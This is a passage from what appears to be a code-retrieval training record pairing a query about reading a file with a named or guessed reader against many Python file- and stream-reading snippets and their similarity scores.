reader(client: socket.socket, reader_id: int) -> tuple:\n\n logging.info(\"reader %s connected\", reader_id)\n\n # read all data till the end\n data = b\"\"\n while True:\n chunk = client.recv(1024)\n if not chunk:\n break\n data += chunk\n\n # close client (shutdown shared socket for all processes)\n client.shutdown(socket.SHUT_RDWR)\n client.close()\n\n logging.info(\"reader %s read %s bytes, connection closed\", reader_id, len(data))\n\n # process data\n rsp = ContentProcessor.put(data)\n\n logging.info(\"reader %s data processed %s\", reader_id, rsp)\n\n return (repr(rsp), reader_id)", "def _read(self, string=\"\", fname=\"\"):\n if string:\n self.handle = gv.readstring(string)\n elif fname == \"stdin\":\n data = sys.stdin.read()\n self.handle = gv.readstring(data)\n else:\n self.handle = gv.read(fname)\n # gv returns None if eg. the input does not exist\n if not self.handle:\n raise ValueError(\"Error with file \" + fname)", "def _get_reader_fn(self, reader, reader_method=None, path=None) -> Callable:\n if reader_method is None and path is None:\n raise ExecutionEngineError(\n \"Unable to determine spark reader function without reader_method or path\"\n )\n\n if reader_method is None:\n reader_method = self.guess_reader_method_from_path(path=path)\n\n reader_method_op: str = reader_method.lower()\n try:\n if reader_method_op == \"delta\":\n return reader.format(reader_method_op).load\n return getattr(reader, reader_method_op)\n except AttributeError:\n raise ExecutionEngineError(\n f\"Unable to find reader_method {reader_method} in spark.\",\n )", "def readLine(self, default=None):\n raise NotImplementedError()", "def reader(handle, input_queue):\n input_queue.put(handle.read())", "def open_reader(self, **kw):\n return self.table.open_reader(str(self), **kw)", "def _simple_read(filename, converter):\n with open(filename) as file:\n return converter(file.read())", "def test_file_read_bin_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read_bin()", "def read_stream(stream_name, input_stream, io_q):\n if not input_stream:\n io_q.put((stream_name, \"EXIT\"))\n return\n for line in input_stream:\n io_q.put((stream_name, line))\n if not input_stream.closed:\n input_stream.close()\n io_q.put((stream_name, \"EXIT\"))", "def open(path, override_extension=None):\n extension = override_extension or os.path.splitext(path)[1][1:]\n return read_stream(builtins.open(path, 'rb'), extension)", "def readinto(self, buf: bytes, /) -> Optional[int]:", "def read_instream(instream):\n # If you need to read a csv, create a DataFrame, or whatever it might be,\n # do it here.\n return instream.read()", "def snappy_read_block(stream, buffer):\n block_len = read_long(stream)\n data = stream.read(block_len)\n # Trim off last 4 bytes which hold the CRC32\n decompressed = snappy.decompress(data[:-4])\n buffer.truncate(0)\n buffer.seek(0)\n buffer.write(decompressed)\n buffer.seek(0)", "def guess_reader_method_from_path(path: str):\n path = path.lower()\n if path.endswith(\".csv\") or path.endswith(\".tsv\"):\n return \"csv\"\n elif (\n path.endswith(\".parquet\") or path.endswith(\".parq\") or path.endswith(\".pqt\")\n ):\n return \"parquet\"\n\n raise ExecutionEngineError(\n f\"Unable to determine reader method from path: {path}\"\n )", "def _handle_reading(self, soc):\n chunk = soc.recv(_RECV_CHUNK_SIZE)\n if not chunk:\n self._handle_error(soc) # unexpected EOF\n return\n if soc not in self._reading:\n self._reading[soc] = \"\"\n self._reading[soc] += chunk.decode(\"utf-8\")\n\n if self._reading[soc].endswith(\"\\r\\n\\r\\n\"):\n # Finished reading request headers, don't expect request body.\n self._log(\"read %r\" % self._reading[soc])\n headers = self._reading[soc]\n self._reading[soc] = \"\"\n\n if not headers.startswith(\"GET \"):\n raise Exception(\"Only GET requests are supported.\")\n self._writing[soc], hook = self._responses[headers.split()[1]]\n\n # Move the socket to list of things waiting to write.\n self._read_list.remove(soc)\n self._write_list.append(soc)\n\n hook(self, soc)", "def read(path, repo=None, rev=None, remote=None, mode=\"r\", encoding=None):\n with open(\n path, repo=repo, rev=rev, remote=remote, mode=mode, encoding=encoding\n ) as fd:\n return fd.read()", "def get_read_parser(format):\n format = format.lower()\n if format == 'bed':\n return BedReadParser\n elif format == 'bedpe':\n return BedPeReadParser\n elif format == 'sam':\n return SamReadParser\n elif format == 'bam':\n return BamReadParser\n else:\n raise ValueError(f\"unknown read file format: {format!r}\")", "def read(self, path, exception=True):\n f = self._openPath(path, exception=exception)\n if f: self.readObject(path, f)", "def read_file(path, source):\n if source == 'srim':\n return read_srim(path)\n elif source == 'astar':\n return read_astar(path)\n else:\n raise ValueError('Unknown data source {}'.format(source))", "def get_iter(self, reader: DataReader):\n\n if reader is None:\n return None\n\n xs, ys = get_dataset(reader)\n\n return self.prepare_dataset(xs, ys)" ]
[ "0.6057923", "0.6019735", "0.5995071", "0.59576786", "0.5762868", "0.5712855", "0.5576423", "0.544311", "0.54237616", "0.54231197", "0.5403411", "0.53777176", "0.53776944", "0.52933985", "0.5291875", "0.52114725", "0.5191779", "0.5167444", "0.514691", "0.51206833", "0.510413", "0.50981784", "0.50818163", "0.5051923", "0.50517976", "0.503986", "0.50289977", "0.50232327", "0.50008893", "0.48906842", "0.4882231", "0.48818547", "0.48760203", "0.48579478", "0.4855577", "0.48527634", "0.48463434", "0.48335013", "0.48281315", "0.4826273", "0.48165932", "0.4799883", "0.47886893", "0.47691038", "0.4743272", "0.47208753", "0.47083166", "0.4697216", "0.4696926", "0.46849045", "0.46800685", "0.4672618", "0.46710542", "0.4665734", "0.4642792", "0.4638772", "0.46295205", "0.4627178", "0.46206447", "0.46076098", "0.4604761", "0.46009442", "0.45983055", "0.4598074", "0.45825595", "0.4572856", "0.456564", "0.45541283", "0.45522875", "0.45479795", "0.45421654", "0.45394954", "0.45394954", "0.45365945", "0.45363304", "0.45345557", "0.4534513", "0.45316216", "0.45309561", "0.4525862", "0.45247525", "0.45240054", "0.45135203", "0.45095623", "0.4504586", "0.45043823", "0.4499532", "0.44976705", "0.4496618", "0.4495163", "0.44942188", "0.44923657", "0.44892934", "0.44861394", "0.4482171", "0.44803962", "0.44794074", "0.4478571", "0.44782218", "0.4472176" ]
0.6454055
0
Read a file with a given reader If the reader is not specified, an attempt to guess at an appropriate reader is made. A NoReaderFound error is raised if no such appropriate reader is found.
def read_file( file_path: Union[str, pathlib.Path], reader_name: Optional[str] = None, **reader_args: Any, ) -> Reader: with open(file_path, mode="rb") as input_stream: return read_stream(input_stream, reader_name)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def read(filePath, reader='infer'):\n if isinstance(reader, str):\n if reader == 'infer':\n loader = inferReader(filePath)\n else:\n if reader in READERS:\n loader = READERS[reader]\n else:\n raise SerpentToolsException(\n 'Reader type {} not supported'.format(reader)\n )\n else:\n assert callable(reader), (\n 'Reader {} is not callable'.format(str(reader)))\n loader = reader\n returnedFromLoader = loader(filePath)\n returnedFromLoader.read()\n return returnedFromLoader", "def _get_reader(self, filepath: str):\n file_extension = os.path.splitext(filepath)[-1]\n\n self._validate_file(filepath)\n\n if file_extension == \".ipynb\":\n return NotebookReader(filepath)\n elif file_extension in [\".py\", \".r\"]:\n return FileReader(filepath)\n else:\n raise ValueError(f\"File type {file_extension} is not supported.\")", "def inferReader(filePath):\n for reg, reader in six.iteritems(REGEXES):\n match = re.match(reg, filePath)\n if match and match.group() == filePath:\n debug('Inferred reader for {}: {}'\n .format(filePath, reader.__name__))\n return reader\n raise SerpentToolsException(\n 'Failed to infer filetype and thus accurate reader from'\n 'file path {}'.format(filePath)\n )", "def get_reader(fn):\n if is_bed(fn):\n return BedReader(fn)\n elif is_vcf(fn):\n return VcfReader(fn)\n else:\n raise ValueError(\"Could not get reader for %s\" % fn)", "def get_file_reader(path):\n return get_by_scheme(path, SCHEMAS_TO_FILEREADERS, LocalFileReader)", "def read(filename, file_format=None, **kwargs):\n if not isinstance(filename, str):\n raise TypeError()\n if not (file_format is None or file_format in {\"tough\", \"json\"}):\n raise ValueError()\n\n fmt = (\n file_format\n if file_format\n else filetype_from_filename(filename, _extension_to_filetype)\n )\n fmt = fmt if fmt else \"tough\"\n\n return _reader_map[fmt](filename, **kwargs)", "def test_from_reader_both_given(self):\n pandoc_default_files = [\n os.path.join(\n TEST_DEFAULT_FILES_PATH, \"from_reader_both_given.yaml\"\n )\n ]\n\n settings = get_settings(PANDOC_DEFAULT_FILES=pandoc_default_files)\n\n pandoc_reader = PandocReader(settings)\n source_path = os.path.join(TEST_CONTENT_PATH, \"valid_content.md\")\n\n with self.assertRaises(ValueError) as context_manager:\n pandoc_reader.read(source_path)\n\n message = str(context_manager.exception)\n self.assertEqual(\n (\n \"Specifying both from and reader is not supported.\"\n \" Please specify just one.\"\n ),\n message,\n )", "def get_reader(reader_type):\n return reader_dict.get(reader_type, None)", "def readerForFile(filename, encoding, options):\n ret = libxml2mod.xmlReaderForFile(filename, encoding, options)\n if ret is None:raise treeError('xmlReaderForFile() failed')\n return xmlTextReader(_obj=ret)", "def reader_from_file(load_dir: str, **kwargs):\n shared_resources = create_shared_resources()\n shared_resources.load(os.path.join(load_dir, \"shared_resources\"))\n if kwargs:\n shared_resources.config.update(kwargs)\n reader = readers[shared_resources.config[\"reader\"]](shared_resources)\n reader.load_and_setup_modules(load_dir)\n return reader", "def _resolve_reader(self):\n self.fh = self.path.fs.open(self.path, 'rU')\n self.resolved = csv.reader(self.fh, delimiter=self.delimiter)", "def read(self, location, **user_options):\n\n # Base the options off a copy to leave the Reader options uneffected.\n options = self.options.copy()\n options.update(user_options)\n\n # The directory option allows users to specify file locations relative\n # to a location other than the present working directory by joining the\n # location with the directory of their choice.\n if options.directory:\n location = os.path.join(options.directory, location)\n\n # When passed a directory as the location, the Reader recursively builds\n # a list of replays to return using the utils.get_files function. This\n # function respects the following arguments:\n # * depth: The maximum depth to traverse. Defaults to unlimited (-1)\n # * follow_symlinks: Boolean for following symlinks. Defaults to True\n # * exclude_dirs: A list of directory names to skip while recursing\n # * incldue_regex: A regular expression rule which all returned file\n # names must match. Defaults to None\n #\n replays, files = list(), utils.get_files(location, **options)\n\n # If no files are found, it could be for a variety of reasons\n # raise a NoMatchingFilesError to alert them to the situation\n if not files:\n raise exceptions.NoMatchingFilesError()\n\n for location in files:\n if options.verbose: print \"Reading: %s\" % location\n\n with open(location, 'rb') as replay_file:\n replays.append(self.make_replay(replay_file, **options))\n\n return replays", "def _read_file(self, options, datas):\n self.ensure_one()\n # guess mimetype from file content\n mimetype = guess_mimetype(datas)\n (file_extension, handler, req) = FILE_TYPE_DICT.get(mimetype, (None, None, None))\n if handler:\n try:\n return getattr(self, '_read_' + file_extension)(options, datas)\n except Exception:\n _logger.warn(\"Failed to read file '%s' (transient id %d) using guessed mimetype %s\", self.datas_fname or '<unknown>', self.id, mimetype)\n # try reading with user-provided mimetype\n (file_extension, handler, req) = FILE_TYPE_DICT.get(self.type, (None, None, None))\n if handler:\n try:\n return getattr(self, '_read_' + file_extension)(options, datas)\n except Exception:\n _logger.warn(\"Failed to read file '%s' (transient id %d) using user-provided mimetype %s\", self.datas_fname or '<unknown>', self.id, self.type)\n # fallback on file extensions as mime types can be unreliable (e.g.\n # software setting incorrect mime types, or non-installed software\n # leading to browser not sending mime types)\n if self.datas_fname:\n p, ext = os.path.splitext(self.datas_fname)\n if ext in EXTENSIONS:\n try:\n return getattr(self, '_read_' + ext[1:])(options, datas)\n except Exception:\n _logger.warn(\"Failed to read file '%s' (transient id %s) using file extension\", self.datas_fname, self.id)\n if req:\n raise ImportError(_(\"Unable to load \\\"{extension}\\\" file: requires Python module \\\"{modname}\\\"\").format(extension=file_extension, modname=req))\n raise ValueError(_(\"Unsupported file format \\\"{}\\\", import only supports CSV, ODS, XLS and XLSX\").format(self.type))", "def _file_read(fname):\n if not os.path.exists(fname):\n parser.error(\"File '{0}' not found.\".format(fname))\n return open(fname, 'r')", "def test_file_read_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read()", "def readFile(subdir, name, errorOnNonexistent=False, default=None):\n\n fname = _getFilename(subdir, name)\n # Note: this would probably look more natural as:\n # if not os.path.exists(fname):\n # # ... file does not exist ...\n # else:\n # try:\n # with open(fname) as f:\n # # ... read file ...\n # except:\n # # ... assume file was malformed ...\n # but there's technically a race condition in the above: the file could be\n # removed after the os.path.exists() check and before the open(fname). This\n # isn't going to matter in practice, but on principle I've coded it in a\n # different way which I _think_ avoids that race condition.\n #\n # Technically fileExists is really more like \"file is a regular file and we\n # have permission to read it\", but the point is that if we can't read it\n # and errorOnNonexistent is False, then we want to return the default value\n # rather than error.\n fileExists = False\n try:\n with open(fname, \"r\") as f:\n fileExists = True\n return json.load(f)\n except:\n if not fileExists and not errorOnNonexistent:\n return default\n else:\n raise", "def read(self, args):\n assert self.exists(args=args)\n file_path = self.path(args)\n file_str = autofile.read_file(file_path)\n file_dat = self.reader_(file_str)\n assert self.checker_(file_dat)\n return file_dat", "def load_input_reader(input_params):\n if \"abstract\" in input_params:\n driver_name = input_params[\"abstract\"][\"format\"]\n elif \"path\" in input_params:\n input_file = input_params[\"path\"]\n driver_name = driver_from_file(input_file)\n else:\n raise errors.MapcheteDriverError(\n \"invalid input parameters %s\" % input_params)\n if driver_name not in available_input_formats():\n raise errors.MapcheteDriverError(\n \"driver %s not found in %s\" % (\n driver_name, available_input_formats())\n )\n for v in pkg_resources.iter_entry_points(_DRIVERS_ENTRY_POINT):\n try:\n # instanciate dummy input reader to read metadata\n input_reader = v.load().InputData.__new__(\n v.load().InputData, input_params)\n if input_reader.METADATA[\"driver_name\"] == driver_name:\n return v.load().InputData(input_params)\n except (AttributeError, errors.MapcheteConfigError):\n pass\n raise errors.MapcheteDriverError(\n \"no loader for driver '%s' could be found.\" % driver_name)", "def load_reader(path):\n if path[-4:] != '.pkl':\n path+='.pkl'\n with open(path,\"r+b\") as f:\n log(\"Loading reader from {}\".format(path))\n r = pickle.load(f)\n return r", "def _get_reader_fn(self, reader, reader_method=None, path=None) -> Callable:\n if reader_method is None and path is None:\n raise ExecutionEngineError(\n \"Unable to determine spark reader function without reader_method or path\"\n )\n\n if reader_method is None:\n reader_method = self.guess_reader_method_from_path(path=path)\n\n reader_method_op: str = reader_method.lower()\n try:\n if reader_method_op == \"delta\":\n return reader.format(reader_method_op).load\n return getattr(reader, reader_method_op)\n except AttributeError:\n raise ExecutionEngineError(\n f\"Unable to find reader_method {reader_method} in spark.\",\n )", "def get_reader_fn(input_fp=None):\n if input_fp is None:\n return OdpsTableReader if \"PAI\" in tf.__version__ else CSVReader\n\n if \"odps://\" in input_fp:\n return OdpsTableReader\n else:\n return CSVReader", "def legacy_get_reader(self, **kwargs):\n\n # Note: this will break thread-safety\n self._request._kwargs = kwargs\n\n # safeguard for DICOM plugin reading from folders\n try:\n assert Path(self._request.filename).is_dir()\n except OSError:\n pass # not a valid path on this OS\n except AssertionError:\n pass # not a folder\n else:\n return self._format.get_reader(self._request)\n\n self._request.get_file().seek(0)\n return self._format.get_reader(self._request)", "def guess_reader_method_from_path(path: str):\n path = path.lower()\n if path.endswith(\".csv\") or path.endswith(\".tsv\"):\n return \"csv\"\n elif (\n path.endswith(\".parquet\") or path.endswith(\".parq\") or path.endswith(\".pqt\")\n ):\n return \"parquet\"\n\n raise ExecutionEngineError(\n f\"Unable to determine reader method from path: {path}\"\n )", "def _read_file(file_name):\n file_handle = file(file_name)\n try:\n return file_handle.read()\n finally:\n file_handle.close()", "def get_reader(fname):\n\n if fname == \"-\":\n fh = sys.stdin\n else:\n fh = open(fname, \"r\")\n \n rdr = csv.reader(fh, dialect=\"psv\")\n return (rdr, fh)", "def read(self, file_name):\n msg = \"ReaderWriterBase::read called!\"\n raise NotImplementedError(msg)", "def read_file(path, source):\n if source == 'srim':\n return read_srim(path)\n elif source == 'astar':\n return read_astar(path)\n else:\n raise ValueError('Unknown data source {}'.format(source))", "def read_file(self) -> misc_.file_readers.FileReaderHandler:\n\t\treturn self._read_file", "def readFromFile(filename):\n raise NotImplementedError", "def read(self, filename=None):\n\t\tif filename is None:\n\t\t\tif hasattr(self, 'filename'):\n\t\t\t\tfilename = os.path.join(self.path, self.filename)\n\t\t\telse:\n\t\t\t\traise Exception, 'no filename given!'\n\t\tif os.path.splitext(filename)[1] in self.extensions and os.path.exists(filename):\n\t\t\tfor line in open(filename).readlines():\n\t\t\t\tself.read_line(line)", "def CaseReader(filename):\n\n try:\n reader = SqliteCaseReader(filename)\n return reader\n except IOError:\n # filename not a valid Sqlite database file\n pass\n\n try:\n reader = HDF5CaseReader(filename)\n return reader\n except IOError:\n raise IOError('Unable to load cases from file {0}'.format(filename))", "def test_fast_reader():\n text = \"a b c\\n1 2 3\\n4 5 6\"\n with pytest.raises(ParameterError): # C reader can't handle regex comment\n ascii.read(text, format=\"fast_basic\", guess=False, comment=\"##\")\n\n # Enable multiprocessing and the fast converter\n try:\n ascii.read(\n text,\n format=\"basic\",\n guess=False,\n fast_reader={\"parallel\": True, \"use_fast_converter\": True},\n )\n except NotImplementedError:\n # Might get this on Windows, try without parallel...\n if os.name == \"nt\":\n ascii.read(\n text,\n format=\"basic\",\n guess=False,\n fast_reader={\"parallel\": False, \"use_fast_converter\": True},\n )\n else:\n raise\n\n # Should raise an error if fast_reader has an invalid key\n with pytest.raises(FastOptionsError):\n ascii.read(text, format=\"fast_basic\", guess=False, fast_reader={\"foo\": True})\n\n # Use the slow reader instead\n ascii.read(text, format=\"basic\", guess=False, comment=\"##\", fast_reader=False)\n # Will try the slow reader afterwards by default\n ascii.read(text, format=\"basic\", guess=False, comment=\"##\")", "def test_file_readas_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).read_as(\"utf-8\")", "def read_stream(\n input_stream: IO[bytes], reader_name: Optional[str] = None, **reader_args: Any\n) -> Reader:\n if reader_name is None:\n reader_name = identify(input_stream)\n\n reader = plugins.call(\n package_name=__name__,\n plugin_name=reader_name,\n input_stream=input_stream,\n **reader_args,\n )\n reader.read()\n return reader", "def test_file_readlines_missing_file(self):\n with (self.assertRaises(IOError)):\n FileReader(self.bogus_path).readlines()", "def read_from_file(self, filename, encoding=\"utf-8\", compat_mode=False):\n # Nesting level is only ever set here and `read_from_string`, nowhere else as of now.\n self.encoding = encoding\n if compat_mode:\n self.compat_mode = compat_mode\n with contextlib.closing(get_textfile_stream(filename, encoding)) as stream:\n return self.read_from_readline_interface(stream.readline, filename, compat_mode=compat_mode)", "def read_on(reader, f):\n while True:\n try:\n line = reader(f)\n except StopIteration:\n break\n\n if line is not None:\n yield line", "def _get_infile(filepath):\n # type: (Text) -> BinaryIO\n if filepath is None:\n return sys.stdin\n else:\n if not os.path.exists(filepath):\n raise OSError('File does not exist: {}'.format(filepath))\n return open(filepath, 'r')", "def get_read_parser(format):\n format = format.lower()\n if format == 'bed':\n return BedReadParser\n elif format == 'bedpe':\n return BedPeReadParser\n elif format == 'sam':\n return SamReadParser\n elif format == 'bam':\n return BamReadParser\n else:\n raise ValueError(f\"unknown read file format: {format!r}\")", "def read_file(self, *args, **kwargs):\n if self.detector == \"FACET\":\n return self.read_facet(self.filename)\n elif self.detector == \"OpenFace\":\n return self.read_openface(self.filename)\n elif self.detector == \"Affectiva\":\n return self.read_affectiva(self.filename)\n elif self.detector == \"Feat\":\n return self.read_feat(self.filename)\n else:\n print(\"Must specifiy which detector [Feat, FACET, OpenFace, or Affectiva]\")", "def __init__(self, filename='', use_cython=True, raw=None):\n \n if raw and not filename:\n # Load raw data exterinally\n self.raw = raw\n return\n \n # Defaults to cython reader if user selects it\n if use_cython and cython_loaded:\n self.raw = _reader.Read(filename)\n\n # Python reader for debug purposes\n else:\n self.raw = PythonReader.Read(filename)", "def _simple_read(filename, converter):\n with open(filename) as file:\n return converter(file.read())", "def read_image(fname, roi=None, dset_name='default', parallelism=1):\n\n from functools import partial\n from numpy import array, ndarray\n from multiprocessing import Pool, cpu_count\n\n if isinstance(fname, str):\n fmt = fname.split('.')[-1]\n \n if fmt == '.h5' or fmt == '.hdf5':\n reader = partial(readers[fmt], roi=roi, dset_name=dset_name)\n else:\n reader = partial(readers[fmt], roi=roi)\n \n result = reader(fname)\n\n elif isinstance(fname, (tuple, list, ndarray)):\n fmt = fname[0].split('.')[-1]\n if fmt == '.h5' or fmt == '.hdf5':\n reader = partial(readers[fmt], roi=roi, dset_name=dset_name)\n else:\n reader = partial(readers[fmt], roi=roi)\n\n if parallelism == 1:\n result = array([reader(f) for f in fname])\n\n else:\n if parallelism == -1:\n num_cores = cpu_count()\n else:\n num_cores = min(parallelism, cpu_count())\n\n with Pool(num_cores) as pool:\n result = array(pool.map(reader, fname))\n else:\n raise TypeError(\n \"First argument must be string for a one file or (tuple, list, ndarray) for many files\"\n )\n\n return result", "def open_file(file_name):\n\n try:\n return open(file_name, 'rt')\n except Exception as e:\n raise UserException(\"unable to open file {0}\".format(file_name),\n str(e))", "def open_file(filename=\"default.txt\", filepath=\"default_path\"):\n\n if filepath == \"default_path\":\n filepath = \"\"\n\n try:\n fp = open(filepath + filename, \"r+\") # Opens file for reading and writing\n return fp\n except IOError:\n l.error(str(filepath + filename) + \" is not an existing file.\")", "def fit_reader(self, reader):\n return self.fit(line for (_, line) in reader.readsents(silent=False))", "def read(self, source, sourcename=None, postcheck=True, strict=True):\n if isinstance(source, str):\n with open(source, mode=\"r\") as stream:\n return self.readTextStream(\n stream,\n sourcename or source,\n postcheck=postcheck,\n strict=strict,\n )\n elif isinstance(source, pathlib.Path):\n with source.open(mode=\"r\") as stream:\n return self.readTextStream(\n stream,\n sourcename or str(source),\n postcheck=postcheck,\n strict=strict,\n )\n elif isinstance(source, io.BufferedIOBase):\n return self.readTextStream(\n io.TextIOWrapper(source),\n sourcename,\n postcheck=postcheck,\n strict=strict,\n )\n elif not isinstance(source, io.TextIOBase):\n raise TypeError(\n \"Source must be file name (str or pathlib.Path) or \"\n \"readable stream of text data. Got {}\".format(type(source))\n )\n return self.readTextStream(\n source, sourcename, postcheck=postcheck, strict=strict\n )", "def readFile( *args ):\n filePath = path.join( *args )\n if not path.exists( filePath ):\n return None\n with open( filePath, 'r' ) as fd:\n return fd.read()", "def open_reader(self, **kw):\n return self.table.open_reader(str(self), **kw)", "def validate_file(\n file: str,\n format: FormatType = FormatType.csv,\n delimiter: str = ',',\n header_delimiter: str = None,\n skip_blank_lines: bool = True,\n):\n\n with open_resource(file) as resource_io:\n\n if format == FormatType.csv:\n reader = CSVReader(\n resource_io,\n delimiter=delimiter,\n header_delimiter=header_delimiter,\n skip_blank_lines=skip_blank_lines,\n )\n elif format == FormatType.jsonl:\n reader = JSONLReader(resource_io)\n elif format == FormatType.json:\n reader = JSONReader(resource_io)\n else:\n raise ValueError\n\n for _ in reader:\n pass", "def my_reader(filename, sheetname='Sheet1', separ=','):\r\n global df_read\r\n filename_list = filename.split('.')\r\n extension = filename_list[-1]\r\n if extension == 'csv':\r\n df_read = pd.read_csv(filename, sep=separ)\r\n if extension == 'data':\r\n df_read = pd.read_csv(filename, sep=separ, header=None)\r\n if extension == 'txt':\r\n df_read = pd.read_csv(filename, sep=separ)\r\n if extension == 'json':\r\n df_read = pd.read_json(filename)\r\n if extension == 'html':\r\n df_read = pd.read_html(filename)\r\n if extension == 'xls':\r\n df_read = pd.read_excel(pd.ExcelFile(filename), sheetname)\r\n if extension == 'xlsx':\r\n df_read = pd.read_excel(pd.ExcelFile(filename), sheetname)\r\n if extension == 'feather':\r\n df_read = pd.read_feather(filename)\r\n if extension == 'parquet':\r\n df_read = pd.read_parquet(filename)\r\n if extension == 'msg':\r\n df_read = pd.read_msgpack(filename)\r\n if extension == 'dta':\r\n df_read = pd.read_stata(filename)\r\n if extension == 'sas7bdat':\r\n df_read = pd.read_sas(filename)\r\n if extension == 'pkl':\r\n df_read = pd.read_pickle(filename)\r\n return df_read", "def rnn_reader(file_path, word_dict, is_infer):\n\n def reader():\n with open(file_path) as f:\n for line_id, line in enumerate(f):\n yield record_reader(line, word_dict, is_infer)\n\n return reader", "def reader(name, version=None, mimetype=None):\n\treturn _data_processor('read', name, version, mimetype)", "def test_read_raw_suggested(fname):\n with pytest.raises(ValueError, match='Try reading'):\n read_raw(fname)", "def read(self, filename=None, **kwargs):\n if filename:\n self.filename = filename\n if not self.filename:\n raise Exception('No filename provided')\n if not os.path.isfile(self.filename):\n raise OSError(2,'File not found:',self.filename)\n if os.stat(self.filename).st_size == 0:\n raise EmptyFileError('File is empty:',self.filename)\n # Calling children function\n self._read(**kwargs)", "def readerForFd(fd, URL, encoding, options):\n ret = libxml2mod.xmlReaderForFd(fd, URL, encoding, options)\n if ret is None:raise treeError('xmlReaderForFd() failed')\n return xmlTextReader(_obj=ret)", "def read(self, filename=None, **kwargs):\r\n if filename:\r\n self.filename = filename\r\n if not self.filename:\r\n raise Exception('No filename provided')\r\n if not os.path.isfile(self.filename):\r\n raise OSError(2,'File not found:',self.filename)\r\n if os.stat(self.filename).st_size == 0:\r\n raise EmptyFileError('File is empty:',self.filename)\r\n # Calling children function\r\n self._read(**kwargs)", "def read(*rnames):\n with open(os.path.join(os.path.dirname(__file__), *rnames)) as f:\n return f.read()", "def read(self, path, exception=True):\n f = self._openPath(path, exception=exception)\n if f: self.readObject(path, f)", "def txt_file_reader(path):\n return open(path, encoding=cfg.ENCODING)", "def read_file(string_object):\n try:\n return open(string_object,\"r\")\n except FileNotFoundError:\n return None", "def read_or_default(self, default: str):\n if os.path.isfile(self._path):\n return self.read()\n return default", "def load_data_reader(data_reader=\"SpreadsheetDataReader\"):\n return importlib.import_module('c302.%s'%data_reader)", "def job_reader(path) -> Generator[ParsedActionType, None, None]:\n try:\n with open(path, \"r\") as f:\n parser = Parser()\n for line in f:\n result = parser.process_line(line)\n if result is not None:\n yield result\n except IOError as err:\n print(\"Error opening/reading from file '{0}': {1}\"\n .format(err.filename, err.strerror))", "def _open_file(path):\n\n if 'None.txt' in path:\n return None\n try:\n with open(path, 'r', encoding='utf-8') as file:\n return file.read().strip()\n except UnicodeDecodeError:\n try:\n with open(path, 'rb') as file:\n return file.read().strip()\n except OSError:\n logging.error(FileNotFoundError(f'Cant open {path}'))", "def _get_reader_class(basename: str) -> Type[BaseEEGReader]:\n if basename.endswith(\".h5\"):\n return RamulatorHDF5Reader\n elif basename.endswith((\".bdf\", \".mff\", \".raw\")):\n return ScalpEEGReader\n elif basename.endswith(\".npy\"):\n return NumpyEEGReader\n else:\n return SplitEEGReader", "def read(*names, **kwargs):\n with io.open(\n os.path.join(os.path.dirname(__file__), *names),\n encoding=kwargs.get(\"encoding\", \"utf8\"),\n ) as fp:\n return fp.read()", "def read_file(filename):\r\n if Py3:\r\n return open(filename, \"r\", newline='')\r\n return open(filename, \"rb\")", "def test_read_raw_unsupported_single(fname):\n with pytest.raises(ValueError, match='Unsupported file type'):\n read_raw(fname)", "def readFile(filename, print_error=True):\n try:\n fp = open(filename)\n try:\n return fp.read()\n finally:\n fp.close()\n except IOError:\n if print_error:\n print('Error reading %s: %s' % (filename, sys.exc_info()[1]))\n return None", "def reader(path: str) -> Tuple[List[str], str]:\n\n if not os.path.isfile(path):\n return None, \"No file %s found\", path\n\n with open(path, 'r') as f:\n try:\n return json.load(f), None\n\n except Exception as ex:\n return None, ex", "def read(self, filename):\n raise NotImplementedError", "def read_file(self, file_path: str, inner_separator: str = None, outer_separator: str = None,\n query_format: QueryFormat = QueryFormat.CROSS_PRODUCT) -> Tuple[Dict, str, str, str]:\n\n if not file_path:\n raise ValueError(\"No file_path was given!\")\n\n if not os.path.isfile(file_path):\n raise ValueError(\"The given path does not point to an existing file!\")\n\n file_type = file_path.split(\".\")[-1]\n\n if inner_separator is None:\n if file_type == \"csv\":\n inner_separator = \",\"\n elif file_type == \"tsv\":\n inner_separator = \"\\t\"\n\n if file_type == \"csv\" or file_type == \"tsv\":\n if outer_separator is None: outer_separator = \"#\"\n return self.read_csv_file(file_path, inner_separator, outer_separator)\n elif file_type == \"sql\":\n return self.read_sql_file(file_path, query_format=query_format)\n else:\n raise ValueError(\"The given file-path points neither to a .csv/.tsv nor a .sql file. Please correct this!\")", "def read_elongation(file_name):\n extension = file_name.split('.')[-1]\n\n if extension == 'prn':\n return read_prn(file_name)\n elif extension == 'csv':\n return read_csv(file_name)\n else:\n raise NotImplementedError(f'Reading {extension} files is not yet implemented.')", "def fs_read(file_path):\n try:\n with open(str(file_path), 'r') as f:\n return f.read()\n except UnicodeDecodeError:\n with open(str(file_path), 'r', encoding='latin-1') as f:\n return f.read()\n except IOError as e:\n raise e", "def _Read(filename):\n with open(filename, 'rb') as f:\n return f.read()", "def read_filepath(self, filename, file_format='FASTA'):\n file_obj = open(filename, 'r')\n ret = self.read_file_object(file_obj, file_format=file_format)\n file_obj.close()\n return ret", "def read(fname, fmt=None):\n if not fmt:\n fmt = fname.split(\".\")[-1]\n\n if fmt in ['yml', 'yaml']:\n return _storage_read(fname, yaml.safe_load)\n elif fmt == \"json\":\n return _storage_read(fname, json.load)\n elif fmt == \"pickle\":\n return _storage_read(fname, pickle.load, 'rb')\n else:\n raise Exception()", "def read(self, filepath, dirpath=None):\n self._raw_read(filepath, dirpath)\n return self._read()", "def readfile(filename, mode='r'):\n if mode != 'r' and mode != 'rb':\n print(f\"ERROR: incorrect mode : expected 'r' or 'rb' given {mode}\\n\")\n else:\n with open(Path(os.path.expanduser(filename)), mode)as f:\n content = f.read()\n f.close()\n return content", "def addReader(self, reader):\n if reader in self._readers:\n # Don't add the reader if it's already there\n return\n self._readers[reader] = True\n fd = reader.fileno()\n if fd in self._fds:\n (_, writer) = self._fds[fd]\n self._fds[fd] = (reader, writer)\n if writer:\n # We already registered this fd for write events,\n # update it for read events as well.\n self._ioloop.update_handler(fd, IOLoop.READ | IOLoop.WRITE)\n else:\n with NullContext():\n self._fds[fd] = (reader, None)\n self._ioloop.add_handler(fd, self._invoke_callback,\n IOLoop.READ)", "def object_readers(name, *, specify_reader=False):\n\treturn object_access('read', name, specify_reader)", "async def read_or_exc(reader, n, timeout = None):\n\n\ttemp = await 